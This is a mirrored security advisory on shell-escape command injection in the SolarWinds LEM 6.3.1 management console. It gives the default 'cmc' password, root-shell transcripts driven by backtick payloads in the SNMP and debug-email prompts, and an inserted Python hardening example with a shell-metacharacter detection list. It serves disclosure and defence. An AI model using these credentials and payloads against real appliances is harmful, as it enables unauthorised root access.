Solarwinds LEM 6.3.1 Shell Escape Command Injection

2017-04-24T00:00:00
ID PACKETSTORM:142277
Type packetstorm
Reporter Hank Leininger
Modified 2017-04-24T00:00:00

Description

KL-001-2017-007 : Solarwinds LEM Management Shell Escape via Command Injection  
  
Title: Solarwinds LEM Management Shell Escape via Command Injection  
Advisory ID: KL-001-2017-007  
Publication Date: 2017.04.24  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-007.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Solarwinds  
Affected Product: Log and Event Manager Virtual Appliance  
Affected Version: v6.3.1  
Platform: Embedded Linux  
CWE Classification: CWE-78: Improper Neutralization of Special  
Elements used in an OS Command  
Impact: Privileged Access  
Attack vector: SSH  
  
2. Vulnerability Description  
  
Insufficient input validation in the management interface can  
be leveraged to execute arbitrary commands. This can lead to  
(root) shell access to the underlying operating system.  
  
3. Technical Description  
  
Should an attacker gain access to the SSH console for the  
cmc user, root access to the underlying operating system can be  
achieved. The default password for the cmc user is "password".  
  
This report details two distinct attack vectors: the username  
input during SNMP setup and the destination email input  
during debug.  
  
============  
= SNMP =  
============  
  
This is accomplished by placing `/bin/bash` in the username  
input during SNMP server setup.  
  
$ ssh cmc@1.3.3.7  
Password:  
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64  
Last login: Sun Dec 11 11:25:07 2016 from 1.3.3.6  
//////////////////////////////////////////////////  
/// SolarWinds Log & Event Manager ///  
/// management console ///  
//////////////////////////////////////////////////  
  
Detected VMware Virtual Platform  
Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH  
Available commands:  
[ appliance ] Network, System  
[ manager ] Upgrade, Debug  
[ service ] Restrictions, SSH, Snort  
[ ndepth ] nDepth Configuration/Maintenance  
upgrade Upgrade this Appliance  
admin Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)  
import Import a file that can be used from the Admin UI  
help display this help  
exit Exit  
cmc > service  
Available commands:  
startssh Start the SSH Service  
stopssh Stop the SSH Service  
restartssh Restart the SSH Service  
restrictssh Restrict Access to the SSH Service (by IP Address/hostname)  
unrestrictssh Remove Restrictions on Access to the SSH Service  
snmp Configure the SNMP Services  
copysnortrules Copy Snort rules to floppy or network share  
loadsnortrules Load Snort rules from floppy or network share  
loadsnortbackup Load Snort rules from backup  
restartsnort Restart the Snort Service  
enableflow * Enable the flow Collection Service  
disableflow Disable the flow Collection Service  
restrictconsole Restrict Access to the Manager Console (GUI) by IP/hostname  
unrestrictconsole Remove Restrictions on Access to the Console (GUI)  
restrictreports Restrict Access to Reports by IP/hostname  
unrestrictreports Remove Restrictions on Access to Reports  
stopopsec Stop all running OPSEC LEA client connections  
help display this help  
exit Return to main menu  
  
NOTE: Commands with an asterisk (*) include an automatic manager service restart  
cmc::service > snmp  
SNMP Trap Logging Service is RUNNNING  
Would you like to STOP the SNMP Trap Logging Service? [Y/n] Y  
  
SNMP Request Service is RUNNNING  
Would you like to STOP the SNMP Request Service? [Y/n] Y  
  
The SNMP Trap Logging Service is stopped.  
The SNMP Request Service is stopped.  
cmc::service > snmp  
SNMP Trap Logging Service is DISABLED  
Would you like to ENABLE the SNMP Trap Logging Service? [Y/n] Y  
  
SNMP Request Service is DISABLED  
Would you like to ENABLE the SNMP Request Service? [Y/n] Y  
  
Enter the port number to access SNMP on LEM (default: 161):  
Enter the username to access SNMP on LEM (default: orion): `/bin/bash`  
Enter the password hashing algorithm (SHA1, MD5 or NO for no authentication, default: SHA1):  
Enter the authentication password (default: orion123):  
Enter the communication encryption algorithm (AES128, DES56 or NO for no encryption, default: AES128):  
Enter the encryption key (default: orion123):  
  
cmc@swi-lem:/usr/local/contego$  
  
  
============  
= Debug =  
============  
  
This is accomplished by placing `/bin/bash` in the destination  
email input during debug.  
  
$ ssh cmc@1.3.3.7  
Password:  
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64  
Last login: Sun Dec 11 23:57:16 2016 from 1.3.3.6  
//////////////////////////////////////////////////  
/// SolarWinds Log & Event Manager ///  
/// management console ///  
//////////////////////////////////////////////////  
  
Detected VMware Virtual Platform  
Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH  
Available commands:  
[ appliance ] Network, System  
[ manager ] Upgrade, Debug  
[ service ] Restrictions, SSH, Snort  
[ ndepth ] nDepth Configuration/Maintenance  
upgrade Upgrade this Appliance  
admin Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)  
import Import a file that can be used from the Admin UI  
help display this help  
exit Exit  
cmc > manager  
Available commands:  
actortoolupgrade * Upgrade your Manager's Actor Tools (CD/floppy)  
archiveconfig Set your Manager Database Archive Schedule/Settings  
backupconfig Set your Manager Backup Schedule/Settings  
cleanagentconfig Reconfigure the agent on this box to a new manager  
configurendepth * Configure the manager to use an nDepth server.  
confselfsignedcert * Configure the manager to use a self signed certificate  
dbrestart Restart database  
debug Send Debugging Information to an Alternate Address  
disabletls Disable TLS for DB connections  
enabletls Enable TLS for DB connections  
exportcert Export the CA certificate for console  
exportcertrequest Export a certificate request for signing by CA  
hotfix Install LEM hotfix.  
importcert * Import a certificate used for console communication  
importl4ca * Import a CA of the other node in L4 configuration  
licenseupgrade * Upgrade your Manager License (CD/floppy/network)  
logbackupconfig Set your Manager Log Backup Schedule/Settings  
resetadmin Reset the "admin" user password to default  
restart * Restart Manager Service  
sensortoolupgrade Upgrade your Manager and Agent Sensor Tools (CD/floppy)  
showlog Show Manager Log File  
showmanagermem Show the memory setting of SolarWinds manager  
start Start Manager Service  
stop * Stop Manager Service  
support Send Debugging Information to Tech Support @trigeo.com  
togglehttp * Enable or disable HTTP (port 80).  
viewsysinfo Show information about machine and SolarWinds manager  
watchlog Watch Manager Log File  
exit Return to main menu  
  
NOTE: Commands with an asterisk (*) include an automatic manager service restart  
cmc::manager > debug  
Press <enter> to capture debugging information  
You will need to provide an SMTP server or Windows File Sharing Credentials  
  
Collecting general system information......UpdateInfo failed: VMware Guest API is not enabled on the host  
UpdateInfo failed: VMware Guest API is not enabled on the host  
UpdateInfo failed: VMware Guest API is not enabled on the host  
UpdateInfo failed: VMware Guest API is not enabled on the host  
UpdateInfo failed: VMware Guest API is not enabled on the host  
UpdateInfo failed: VMware Guest API is not enabled on the host  
.e.sudo: unable to resolve host swi-lem  
sudo: unable to resolve host swi-lem  
.cat: /etc/hosts: No such file or directory  
done.  
sudo: unable to resolve host swi-lem  
E-Mail/Network share/Quit? (e/n/q) e  
E-Mail/Network share/Quit? (e/n/q) e  
Please enter the e-mail recipient:  
(e.g. support@trigeo.com)  
> `/bin/bash >&2`  
Is the e-mail address <`/bin/bash >&2`> correct? <Y/n> Y  
Please enter the name this message should appear from  
(e.g. Someone Important)  
> Test  
Is the name Test correct? <Y/n> Y  
Please enter the e-mail address this message should appear from  
(e.g. someone@trigeo.com)  
> fake@localhost  
Is the e-mail address fake@localhost correct? <Y/n> Y  
Please enter the SMTP server you wish to send mail through  
(e.g. smtp.yournetwork.com)  
> 127.0.0.1  
Is the SMTP server 127.0.0.1 correct? <Y/n> Y  
Please enter the name of your company  
(e.g. Initech, Post Falls branch or Veridian Dynamics)  
> Test  
Is the company Test correct? <Y/n> Y  
Please enter a phone number where you can be reached  
(e.g. 509.555.1234)  
> Test  
Is the number Test correct? <Y/n> Y  
  
--(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--  
/tmp # id  
uid=0(root) gid=0(root) groups=0(root)  
--(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--  
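  
Both prompts above fail the same way: text typed at the menu is spliced into a command line that a shell later evaluates, so backtick substitution runs whatever is inside it. As an added example (not KoreLogic's proof of concept and not Solarwinds' code; the real back-end of the cmc menu is not public, so the tool paths and flags below are placeholders), the following Python contrasts that CWE-78 pattern with a hardened handler for the SNMP username and the debug e-mail fields: inputs are checked against an allow-list, a leading "-" is rejected so the value cannot be read as an option by the back-end tool, and the value is passed as its own argv element with no shell involved.

```python
import re
import shlex
import subprocess
from typing import List

# Placeholder back-end binaries. The real helpers behind the LEM cmc menu are
# not public; these paths and the --user/--to/--from/--smtp flags are assumptions.
SNMP_TOOL = "/usr/local/bin/snmp-setup"
MAIL_TOOL = "/usr/local/bin/send-debug-mail"

# Characters that let a POSIX shell substitute, chain or redirect commands.
# The advisory's inputs rely on backtick substitution, but a complete check
# also has to cover $(...), ;, |, &, redirections, quotes and whitespace.
SHELL_METACHARS = set("`$;|&<>(){}\n\r\t \"'\\*?~#")


def contains_shell_metachars(value: str) -> bool:
    """True when the input could change the meaning of a shell command line.

    Useful as a detection/audit check; the fix is the allow-list below plus
    never handing the value to a shell at all."""
    return any(ch in SHELL_METACHARS for ch in value)


# Allow-lists for the two fields. First character is restricted so a value
# cannot start with "-" and be parsed as an option by the back-end tool.
SNMP_USER_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,31}$")
EMAIL_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9._%+-]*@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*$")
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def validate_snmp_username(value: str) -> str:
    if not SNMP_USER_RE.fullmatch(value):
        raise ValueError(f"invalid SNMP username: {value!r}")
    return value


def validate_email(value: str) -> str:
    if len(value) > 254 or not EMAIL_RE.fullmatch(value):
        raise ValueError(f"invalid e-mail address: {value!r}")
    return value


def validate_host(value: str) -> str:
    if not HOST_RE.fullmatch(value):
        raise ValueError(f"invalid SMTP host: {value!r}")
    return value


def vulnerable_snmp_cmdline(username: str) -> str:
    """The CWE-78 pattern: raw input spliced into a string that is later
    evaluated by a shell (e.g. subprocess.run(..., shell=True) or os.system).
    Only built here, never executed."""
    return f"{SNMP_TOOL} --user {username}"


def hardened_snmp_argv(username: str) -> List[str]:
    """Validated input travels as a separate argv element; no shell parses it."""
    return [SNMP_TOOL, "--user", validate_snmp_username(username)]


def hardened_debug_mail_argv(recipient: str, sender: str, smtp_host: str) -> List[str]:
    """Same treatment for the debug prompt's recipient/sender/SMTP fields."""
    return [
        MAIL_TOOL,
        "--to", validate_email(recipient),
        "--from", validate_email(sender),
        "--smtp", validate_host(smtp_host),
    ]


def run_argv(argv: List[str]) -> subprocess.CompletedProcess:
    """shell=False (the default) hands argv[1:] to the program verbatim."""
    return subprocess.run(argv, shell=False, capture_output=True, text=True, check=False)


if __name__ == "__main__":
    # Constructed input mirroring the advisory's debug-prompt value.
    payload = "`/bin/bash >&2`"
    print("unsafe command line:", vulnerable_snmp_cmdline(payload))
    print("metacharacters present:", contains_shell_metachars(payload))
    try:
        hardened_debug_mail_argv(payload, "fake@localhost", "127.0.0.1")
    except ValueError as err:
        print("rejected:", err)
    # run_argv() is not invoked because the placeholder tools do not exist here.
    print("safe argv:", shlex.join(hardened_snmp_argv("orion")))
```

The allow-list does the real work; `contains_shell_metachars` is only a secondary audit check, because a deny-list of characters is easy to get wrong and still leaves the shell in the loop. Passing an argv list with `shell=False` removes the shell entirely, which is the fix that covers both prompts in the advisory regardless of which substitution syntax an input uses.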
  
4. Mitigation and Remediation Recommendation  
  
The vendor has released a Hotfix to remediate this  
vulnerability. Hotfix and installation instructions are  
available at:  
  
https://thwack.solarwinds.com/thread/111223  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
and Hank Leininger of KoreLogic, Inc.  
  
6. Disclosure Timeline  
  
2017.02.16 - KoreLogic sends vulnerability report and PoC to  
Solarwinds <psirt@solarwinds.com> using PGP key  
with fingerprint  
A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F.  
2017.02.20 - Solarwinds replies that the key is no longer in  
use, requests alternate communication channel.  
2017.02.22 - KoreLogic submits vulnerability report and PoC to  
alternate Solarwinds contact.  
2017.02.23 - Solarwinds confirms receipt of vulnerability  
report.  
2017.04.06 - 30 business days have elapsed since Solarwinds  
acknowledged receipt of vulnerability details.  
2017.04.11 - Solarwinds releases hotfix and public disclosure.  
2017.04.24 - KoreLogic public disclosure.  
  
7. Proof of Concept  
  
See 3. Technical Description  
  
  
The contents of this advisory are copyright(c) 2017  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  